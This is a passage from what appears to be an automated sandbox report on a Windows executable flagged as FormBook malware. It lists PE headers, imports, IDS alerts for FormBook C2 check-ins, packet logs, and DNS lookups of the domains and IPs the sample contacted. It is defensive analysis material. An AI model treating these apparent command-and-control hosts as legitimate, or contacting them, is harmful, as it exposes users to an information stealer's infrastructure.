                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x5bfe0x5c00False0.677097486413data6.48704517882IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x70000x11fe0x1200False0.465494791667data5.27785481266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x90000x264d40x400False0.6669921875data5.22478733059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x380000x5670x600False0.432942708333data3.95240646825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_DIALOG0x381000x100dataEnglishUnited States
                                                                        RT_DIALOG0x382000x11cdataEnglishUnited States
                                                                        RT_DIALOG0x3831c0x60dataEnglishUnited States
                                                                        RT_MANIFEST0x3837c0x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                        USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        04/08/21-13:01:04.899665TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.3118.27.122.19
                                                                        04/08/21-13:01:04.899665TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.3118.27.122.19
                                                                        04/08/21-13:01:04.899665TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.3118.27.122.19
                                                                        04/08/21-13:01:10.374290TCP1201ATTACK-RESPONSES 403 Forbidden804972434.102.136.180192.168.2.3
                                                                        04/08/21-13:01:26.191338TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3184.168.131.241
                                                                        04/08/21-13:01:26.191338TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3184.168.131.241
                                                                        04/08/21-13:01:26.191338TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3184.168.131.241
                                                                        04/08/21-13:01:32.580771TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3108.186.210.142
                                                                        04/08/21-13:01:32.580771TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3108.186.210.142
                                                                        04/08/21-13:01:32.580771TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3108.186.210.142
                                                                        04/08/21-13:02:09.276811TCP1201ATTACK-RESPONSES 403 Forbidden804974134.102.136.180192.168.2.3
                                                                        04/08/21-13:02:14.417071TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.35.101.152.161
                                                                        04/08/21-13:02:14.417071TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.35.101.152.161
                                                                        04/08/21-13:02:14.417071TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.35.101.152.161
                                                                        04/08/21-13:02:19.779296TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3208.91.197.27
                                                                        04/08/21-13:02:19.779296TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3208.91.197.27
                                                                        04/08/21-13:02:19.779296TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3208.91.197.27

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 13:00:59.204536915 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.239547014 CEST8049720160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:00:59.240991116 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.241127968 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.275954008 CEST8049720160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:00:59.276145935 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.276227951 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.310851097 CEST8049720160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:01:04.661916971 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:04.899348021 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:04.899486065 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:04.899665117 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:05.137077093 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137732983 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137748957 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137917042 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:05.137944937 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:05.375267982 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:10.183053017 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.195523024 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:10.195626020 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.195719004 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.207926989 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374289989 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374326944 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374542952 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.374589920 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.388279915 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:15.434912920 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.577671051 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.579060078 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.579214096 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.721441984 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762191057 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762228012 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762248039 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762270927 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762432098 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762463093 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762511015 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762526035 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762551069 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762573004 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762582064 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762597084 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762617111 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762639999 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762687922 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762696028 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904820919 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904866934 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904892921 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904908895 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904916048 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904937983 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904944897 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904959917 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904979944 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904983044 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905005932 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.905006886 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905023098 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905033112 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.905061007 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.906517982 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:26.013341904 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:26.190424919 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:26.190937042 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:26.191338062 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:26.368308067 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698020935 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698050976 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698246956 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:27.183474064 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:27.360460997 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:32.423384905 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.580420017 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:32.580596924 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.580770969 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.737576008 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746746063 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746777058 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746973038 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.747020960 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.906862974 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:37.916631937 CEST4973780192.168.2.3144.76.207.76
                                                                        Apr 8, 2021 13:01:37.939114094 CEST8049737144.76.207.76192.168.2.3
                                                                        Apr 8, 2021 13:01:37.939207077 CEST4973780192.168.2.3144.76.207.76
                                                                        Apr 8, 2021 13:01:37.939346075 CEST4973780192.168.2.3144.76.207.76
                                                                        Apr 8, 2021 13:01:37.961708069 CEST8049737144.76.207.76192.168.2.3
                                                                        Apr 8, 2021 13:01:37.961738110 CEST8049737144.76.207.76192.168.2.3
                                                                        Apr 8, 2021 13:01:43.103451967 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.214458942 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.214612961 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.214939117 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.325964928 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326561928 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326596022 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326626062 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326647043 CEST8049738199.59.242.153192.168.2.3

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 13:00:07.338597059 CEST5020053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:07.358536959 CEST53502008.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:17.232925892 CEST5128153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:17.244834900 CEST53512818.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:19.018038034 CEST4919953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:19.030622959 CEST53491998.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:19.648319006 CEST5062053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:19.660247087 CEST53506208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:20.944005013 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:20.958472013 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:22.159974098 CEST6015253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:22.172446012 CEST53601528.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:23.491069078 CEST5754453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:23.503777981 CEST53575448.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:24.491066933 CEST5598453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:24.504389048 CEST53559848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:25.762635946 CEST6418553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:25.775130987 CEST53641858.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:26.479413033 CEST6511053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:26.492727995 CEST53651108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:27.216310978 CEST5836153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:27.232398987 CEST53583618.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:28.413098097 CEST6349253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:28.425592899 CEST53634928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:34.204361916 CEST6083153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:34.216358900 CEST53608318.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:36.374424934 CEST6010053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:36.387712002 CEST53601008.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:37.448188066 CEST5319553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:37.461617947 CEST53531958.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:38.301493883 CEST5014153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:38.314387083 CEST53501418.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:39.567028999 CEST5302353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:39.585043907 CEST53530238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:41.680629015 CEST4956353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:41.693140030 CEST53495638.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:42.355730057 CEST5135253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:42.368622065 CEST53513528.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:51.113428116 CEST5934953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:51.126154900 CEST53593498.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:56.316626072 CEST5708453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:56.328461885 CEST53570848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:59.163461924 CEST5882353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:59.198601007 CEST53588238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:59.891547918 CEST5756853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:59.924360991 CEST53575688.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:04.290524006 CEST5054053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:04.660743952 CEST53505408.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:09.928239107 CEST5436653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:09.946851015 CEST53543668.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:10.148154020 CEST5303453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:10.182096958 CEST53530348.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:15.401931047 CEST5776253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:15.433754921 CEST53577628.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:20.788542986 CEST5543553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:20.801280975 CEST53554358.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:25.979907036 CEST5071353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:26.011487961 CEST53507138.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:31.832477093 CEST5613253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:31.844346046 CEST53561328.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:32.237593889 CEST5898753192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:32.419924974 CEST53589878.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:35.520607948 CEST5657953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:35.539671898 CEST53565798.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:37.762571096 CEST6063353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:37.914891005 CEST53606338.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:42.984450102 CEST6129253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:43.101130009 CEST53612928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:48.364272118 CEST6361953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:48.380568981 CEST53636198.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:53.388469934 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:53.510649920 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:58.731199026 CEST6194653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:58.843024969 CEST53619468.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:03.885523081 CEST6491053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:04.030394077 CEST53649108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:07.096139908 CEST5212353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:07.109009981 CEST53521238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:09.047559023 CEST5613053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:09.082026958 CEST53561308.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:09.236921072 CEST5633853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:09.249553919 CEST53563388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:14.294907093 CEST5942053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:14.369541883 CEST53594208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:19.483746052 CEST5878453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:19.633713007 CEST53587848.8.8.8192.168.2.3

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Apr 8, 2021 13:00:59.163461924 CEST192.168.2.38.8.8.80xeda7Standard query (0)www.karizcustomizeme.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:04.290524006 CEST192.168.2.38.8.8.80x1c05Standard query (0)www.luxel01.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:10.148154020 CEST192.168.2.38.8.8.80x9af5Standard query (0)www.orchidandiris.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.401931047 CEST192.168.2.38.8.8.80x1e15Standard query (0)www.anadelalastra.artA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:25.979907036 CEST192.168.2.38.8.8.80xb731Standard query (0)www.ecomcourse.onlineA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:32.237593889 CEST192.168.2.38.8.8.80xb135Standard query (0)www.huongdandidong.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:37.762571096 CEST192.168.2.38.8.8.80xceaeStandard query (0)www.muzhskoy-eskort.siteA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:42.984450102 CEST192.168.2.38.8.8.80x72a2Standard query (0)www.simplyhealrhcareplans.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:48.364272118 CEST192.168.2.38.8.8.80x157cStandard query (0)www.opusleaf.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:53.388469934 CEST192.168.2.38.8.8.80xefdfStandard query (0)www.socialunified.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:58.731199026 CEST192.168.2.38.8.8.80xc268Standard query (0)www.myboardinghome.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:03.885523081 CEST192.168.2.38.8.8.80x4492Standard query (0)www.seymor-law.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:09.047559023 CEST192.168.2.38.8.8.80x8a9fStandard query (0)www.lewishackney.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:14.294907093 CEST192.168.2.38.8.8.80xeeacStandard query (0)www.shopthen2.siteA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:19.483746052 CEST192.168.2.38.8.8.80x9bc4Standard query (0)www.kaashir.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Apr 8, 2021 13:00:59.198601007 CEST8.8.8.8192.168.2.30xeda7No error (0)www.karizcustomizeme.comkarizcustomizeme.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:00:59.198601007 CEST8.8.8.8192.168.2.30xeda7No error (0)karizcustomizeme.com160.153.136.3A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:04.660743952 CEST8.8.8.8192.168.2.30x1c05No error (0)www.luxel01.com118.27.122.19A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:10.182096958 CEST8.8.8.8192.168.2.30x9af5No error (0)www.orchidandiris.comorchidandiris.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:01:10.182096958 CEST8.8.8.8192.168.2.30x9af5No error (0)orchidandiris.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)www.anadelalastra.artext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:26.011487961 CEST8.8.8.8192.168.2.30xb731No error (0)www.ecomcourse.onlineecomcourse.onlineCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:01:26.011487961 CEST8.8.8.8192.168.2.30xb731No error (0)ecomcourse.online184.168.131.241A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:32.419924974 CEST8.8.8.8192.168.2.30xb135No error (0)www.huongdandidong.com108.186.210.142A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:37.914891005 CEST8.8.8.8192.168.2.30xceaeNo error (0)www.muzhskoy-eskort.site144.76.207.76A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:43.101130009 CEST8.8.8.8192.168.2.30x72a2No error (0)www.simplyhealrhcareplans.com199.59.242.153A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:48.380568981 CEST8.8.8.8192.168.2.30x157cName error (3)www.opusleaf.comnonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:53.510649920 CEST8.8.8.8192.168.2.30xefdfNo error (0)www.socialunified.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
